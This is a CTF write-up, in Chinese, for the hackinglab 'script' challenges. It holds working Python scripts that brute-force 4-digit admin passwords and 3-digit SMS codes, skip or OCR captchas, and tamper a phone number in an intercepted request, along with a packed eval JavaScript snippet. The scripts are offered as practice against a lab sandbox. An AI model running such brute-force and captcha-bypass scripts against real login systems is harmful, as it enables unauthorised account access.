WP-hackinglab 脚本关(py脚本)

key又又找不到了

点击“_到这里找key__”后页面立刻跳到了一个没有key的页面,说明中间有一次明显的跳转,key应该在被跳过的那个页面里

直接请求./search_key.php,把跳转前的那个响应原样抓下来就好(注意不要跟随跳转,否则看到的还是没有key的页面)

import requests

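# Lab target: plain HTTP on purpose, this host is a CTF sandbox.
url = "http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/search_key.php"

if __name__ == "__main__":
    ssion = requests.Session()
    # The browser is bounced off this page before the key can be read, so fetch
    # it directly.  allow_redirects=False keeps requests from following a
    # server-side 3xx as well, so the *first* response body (where the key is
    # expected) is what gets printed; a timeout stops the script hanging on a
    # dead lab host.
    r = ssion.post(url, allow_redirects=False, timeout=10)
    print(r.content.decode("utf-8", errors="replace"))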

快速口算

明显的脚本题:把页面抓下来,用正则取出算式,算出结果后回传即可。
注意算式来自服务器返回的内容(不可信输入),不要直接eval,改用只允许四则运算的安全求值

import re
import requests

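import ast
import operator
import os

url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
# A PHPSESSID is a live session credential; read it from the environment instead
# of committing it.  The fallback is the (long-expired) value from the writeup.
head = {'cookie': 'PHPSESSID=' + os.environ.get('PHPSESSID', 'e26ab2950d310b1bd6761d85d5ed8353')}

# Raw string: the original '<br/>\s+(.*?)=' relies on an invalid escape that
# newer Pythons warn about.  Pattern is otherwise unchanged.
_EXPR_RE = re.compile(r'<br/>\s+(.*?)=')

_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def _safe_eval(expr: str):
    """Evaluate an arithmetic expression scraped from the challenge page.

    The text comes out of an HTTP response, i.e. from an untrusted party, so it
    must never reach eval().  Only numeric literals, parentheses, the binary
    operators + - * / // % and unary +/- are accepted; ** is deliberately
    excluded so a hostile page cannot burn CPU with huge exponents.

    Raises ValueError for anything else (names, calls, attribute access, an
    empty or unparsable string).
    """
    def _walk(node):
        if isinstance(node, ast.Constant):
            value = node.value
            if isinstance(value, (int, float)) and not isinstance(value, bool):
                return value
        elif isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](_walk(node.left), _walk(node.right))
        elif isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](_walk(node.operand))
        raise ValueError('unsupported expression: %r' % expr)

    try:
        tree = ast.parse(expr.strip(), mode='eval')
    except SyntaxError as exc:
        raise ValueError('not an arithmetic expression: %r' % expr) from exc
    return _walk(tree.body)


if __name__ == '__main__':
    ssion = requests.Session()
    r = ssion.post(url, headers=head, timeout=10).content.decode('utf-8')
    findtext = _EXPR_RE.findall(r)
    if not findtext:
        raise SystemExit('expression not found in page; is PHPSESSID still valid?')
    data = {'v': _safe_eval(findtext[0])}
    print(ssion.post(url, data=data, headers=head, timeout=10).content.decode('utf-8'))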

这个题目是空的

回答空即可,那就是null

怎么就是不弹出key呢?

源码如下:

<script>

// Shadows the browser's alert() so the page's key popup can never appear;
// the writeup's fix is to delete this stub (and the two below) and rerun.
function alert(message) {
    return false;
}
// Neuters document.write for the same reason: no output channel for the key.
document.write = function write() {
    return false;
};
// Third blocked output channel: prompt() is replaced by a no-op.
function prompt(message) {
    return false;
}
// Computes the key.  `b` is a p,a,c,k,e,r-style unpacker applied to a payload
// that is itself packed several layers deep (hence the runs of escaped
// quotes); eval'ing the unpacked string yields `d`, which the page then tries
// to alert().  Because alert() is stubbed out above, nothing is ever shown.
// NOTE(review): this is eval of obfuscated code from a third party -- when
// reproducing locally, run it in DevTools / an isolated profile, not in a
// trusted session.
var a=function (){
var b=function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1s(1e(p,a,c,k,e,r){e=1e(c){1d(c<a?\'\':e(1p(c/a)))+((c=c%a)>1q?1f.1j(c+1k):c.1n(1o))};1g(!\'\'.1h(/^/,1f)){1i(c--)r[e(c)]=k[c]||e(c);k=[1e(e){1d r[e]}];e=1e(){1d\'\\\\w+\'};c=1};1i(c--)1g(k[c])p=p.1h(1l 1m(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1d p}(\'Y(R(p,a,c,k,e,r){e=R(c){S(c<a?\\\'\\\':e(18(c/a)))+((c=c%a)>17?T.16(c+15):c.12(13))};U(!\\\'\\\'.V(/^/,T)){W(c--)r[e(c)]=k[c]||e(c);k=[R(e){S r[e]}];e=R(){S\\\'\\\\\\\\w+\\\'};c=1};W(c--)U(k[c])p=p.V(Z 11(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c]);S p}(\\\'G(B(p,a,c,k,e,r){e=B(c){A c.L(a)};E(!\\\\\\\'\\\\\\\'.C(/^/,F)){D(c--)r[e(c)]=k[c]||e(c);k=[B(e){A r[e]}];e=B(){A\\\\\\\'\\\\\\\\\\\\\\\\w+\\\\\\\'};c=1};D(c--)E(k[c])p=p.C(I J(\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\'+e(c)+\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\',\\\\\\\'g\\\\\\\'),k[c]);A p}(\\\\\\\'t(h(p,a,c,k,e,r){e=o;n(!\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\'.m(/^/,o)){l(c--)r[c]=k[c]||c;k=[h(e){f r[e]}];e=h(){f\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\'};c=1};l(c--)n(k[c])p=p.m(q s(\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\',\\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\\'),k[c]);f p}(\\\\\\\\\\\\\\\'1 3="6";1 4="7";1 5="";8(1 
2=0;2<9;2++){5+=3+4}\\\\\\\\\\\\\\\',j,j,\\\\\\\\\\\\\\\'|u|i|b|c|d|v|x|y|j\\\\\\\\\\\\\\\'.z(\\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\\'),0,{}))\\\',H,H,\\\'|||||||||||||||A||B||M||D|C|E|F||I||J|G|N|O||P|Q|K\\\'.K(\\\'|\\\'),0,{}))\',X,X,\'||||||||||||||||||||||||||||||||||||S|R|V|W|U|T|Y|13|Z|11|14|12|10|19|1a|1b|1c\'.14(\'|\'),0,{}))',1t,1u,'|||||||||||||||||||||||||||||||||||||||||||||||||||||1e|1d|1f|1g|1h|1i|1v|1s|1l||1m|1n|1o|1r|1k|1j|1q|1p|1w|1x|1y|1z'.1r('|'),0,{}))',62,98,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|fromCharCode|29|new|RegExp|toString|36|parseInt|35|split|eval|62|75|53|var|slakfj|teslkjsdflk|for'.split('|'),0,{});
// eval of the unpacked payload; `d` is the value the page wants to display.
var d=eval(b);
alert("key is first 14 chars"+d);
}
</script>
<a href="javascript:a();">_点击之后怎么没反应呢?说好的弹窗呢?__</a>

把下面这三个把alert/document.write/prompt置空的函数去掉,再在本地运行一遍即可弹出key(这类混淆脚本最终会eval,本地运行时建议放在浏览器开发者工具或隔离环境里,不要在常用浏览器会话中执行)

// First of the three stubs to delete: a no-op alert() hides the key popup.
function alert(ignored) { return false; }
// Second stub to delete: document.write() is replaced by a no-op.
document.write = function write() { return false; };
// Third stub to delete: prompt() is replaced by a no-op.
function prompt(ignored) { return false; }

逗比验证码第一期

脚本爆破密码,密码是4位数字(1000-9999)(这一期验证码填不填都可以,脚本里直接留空):

import requests

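import os

count = 0
url = "http://lab1.xseclab.com//vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"
# A PHPSESSID is a live session credential; read it from the environment instead
# of committing it.  The fallback is the (long-expired) value from the writeup.
head = {'cookie': 'PHPSESSID=' + os.environ.get('PHPSESSID', 'cd1c5f7554400cd3978f48d6e5c44c6a')}

if __name__ == "__main__":
    ssion = requests.Session()
    # 4-digit PIN space for user "admin".  vcode is sent empty because, per the
    # writeup, this stage does not gate the login on the captcha.
    for num in range(1000, 10000):
        count += 1
        data = {'username': 'admin', 'pwd': num, 'vcode': '', 'submit': 'submit'}
        # timeout so a stalled lab host cannot hang the brute force forever
        r = ssion.post(url, data=data, headers=head, timeout=10).content.decode('utf-8')
        if 'pwd error' in r:
            print("[%d]\033[1;31mpwd: error %d\033[0m" % (count, num))
        if 'vcode error' in r:
            print('[%d]\033[1;31mvcode error pwd:%d\033[0m' % (count, num))
        if 'error' not in r:
            print('[%d]\033[1;32mpassword is: %d\033[0m' % (count, num))
            print(r)
            # SystemExit instead of the site-module exit(), which is absent under -S
            raise SystemExit(0)
    print('no password found in 1000-9999; check that PHPSESSID is still valid')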

逗比验证码第二期

一样的脚本爆破(这一期验证码不要填,vcode留空提交即可绕过校验):

import requests

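import os

url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php'
# A PHPSESSID is a live session credential; read it from the environment instead
# of committing it.  The fallback is the (long-expired) value from the writeup.
head = {'cookie': 'PHPSESSID=' + os.environ.get('PHPSESSID', 'e26ab2950d310b1bd6761d85d5ed8353')}

if __name__ == '__main__':
    ssion = requests.Session()
    # 4-digit PIN for "admin"; vcode is deliberately left empty -- the writeup
    # notes this stage is bypassed by not supplying a captcha at all.
    for num in range(1000, 10000):
        data = {'username': 'admin', 'pwd': num, 'vcode': '', 'submit': 'submit'}
        r = ssion.post(url, data=data, headers=head, timeout=10).content.decode('utf-8')
        if u'error' in r:
            # flush so the \r progress line is visible even when stdout is a pipe
            print('\r\033[1;31m[-]I\'m trying!!! PROGESS:%d\033[0m' % num, end="", flush=True)
        else:
            print('\n\033[1;32m[+]Find password! %d\033[0m' % num)
            print('\033[1;36m', r, '\033[0m')
            raise SystemExit(0)
    print('\nno password found in 1000-9999; check that PHPSESSID is still valid')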

逗比的验证码第三期(SESSION)

import requests

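import os

url = 'http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php'
# The whole trick of this stage is the session: the PHPSESSID carries the
# captcha state, so it must be a session you prepared in the browser.  Read it
# from the environment rather than committing it; the fallback is the expired
# value from the writeup.
head = {'cookie': 'PHPSESSID=' + os.environ.get('PHPSESSID', 'e26ab2950d310b1bd6761d85d5ed8353')}

if __name__ == '__main__':
    ssion = requests.Session()
    for num in range(1000, 10000):
        data = {'username': 'admin', 'pwd': num, 'vcode': '', 'submit': 'submit'}
        r = ssion.post(url, data=data, headers=head, timeout=10).content.decode('utf-8')
        if u'error' in r:
            print('\r\033[1;31m[-]I\'m trying!!! PROGESS:%d\033[0m' % num, end="", flush=True)
        else:
            print('\n\033[1;32m[+]Find password! %d\033[0m' % num)
            print('\033[1;36m', r, '\033[0m')
            raise SystemExit(0)
    print('\nno password found in 1000-9999; check that PHPSESSID is still valid')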

逗比的手机验证码

用13388886666获取验证码后提交,提示需要用13388886667登录;
那么:先用13388886666获取验证码并提交,用Burp拦截这次请求,把手机号改成13388886667再放行即可(可见服务端校验验证码时只看当前会话,并没有把它和手机号绑定)

基情燃烧的岁月

先爆破验证码:

import requests

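import os

url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php'
# A PHPSESSID is a live session credential; read it from the environment instead
# of committing it.  The fallback is the (long-expired) value from the writeup.
head = {'cookie': 'PHPSESSID=' + os.environ.get('PHPSESSID', 'e26ab2950d310b1bd6761d85d5ed8353')}

if __name__ == '__main__':
    ssion = requests.Session()
    # The SMS code is three digits (100-999).  That it can be brute-forced at all
    # implies the server neither rate-limits nor rotates it per attempt --
    # presumably within one session; confirm if reusing this elsewhere.
    for num in range(100, 1000):
        data = {'username': '13388886666', 'vcode': num, 'Login': 'submit'}
        r = ssion.post(url, data=data, headers=head, timeout=10).content.decode('utf-8')
        if u'error' in r:
            print('\r\033[1;31m[-]I\'m trying!!! PROGESS:%d\033[0m' % num, end="", flush=True)
        else:
            print('\n\033[1;32m[+]Find vcode! %d\033[0m' % num)
            print('\033[1;36m', r, '\033[0m')
            raise SystemExit(0)
    print('\nno vcode found in 100-999; check that PHPSESSID is still valid')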


换手机号13399999999继续爆破:

验证码识别

查看源码以及提示可知,验证码是三位数(100-999);
分析页面js可知,每次提交前都必须重新点击获取验证码,所以脚本里每一轮都新建会话、重新取码、重新识别图片验证码。
脚本如下:

import requests
import pytesseract

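url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php'
urlmobi = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/mobi_vcode.php'
imageurl = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'

if __name__ == '__main__':
    # The page's JS forces a fresh "get code" click before every submit, so each
    # attempt gets its own session, its own SMS-code request and its own image
    # captcha.  NOTE(review): if the server regenerates the SMS code on every
    # request, `num` is not walking a fixed secret but taking a 1/900 guess per
    # round -- the writeup does not say which; expect many iterations.
    for num in range(100, 1000):
        s = requests.Session()
        s.post(urlmobi, data={'getcode': '1', 'mobi': '13388886666'}, timeout=10)
        r = s.get(imageurl, timeout=10)
        with open('1.png', 'wb') as f:
            f.write(r.content)
        # tesseract pads its output with whitespace/newlines; the original only
        # removed inner spaces, so a trailing "\n" could poison the captcha field.
        text = pytesseract.image_to_string('1.png').replace(' ', '').strip()
        data = {'username': '13388886666', 'mobi_code': num, 'user_code': text, 'Login': 'submit'}
        result = s.post(url, data=data, timeout=10).content.decode('utf-8')
        print(num, text, result)
        if 'error' not in result:
            raise SystemExit(0)
    print('no mobi_code found in 100-999')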

pytesseract识别验证码会有误差,多试几次即可;识别结果一般还带有多余的空格和换行,提交前先去掉(strip)
也可使用tesserocr
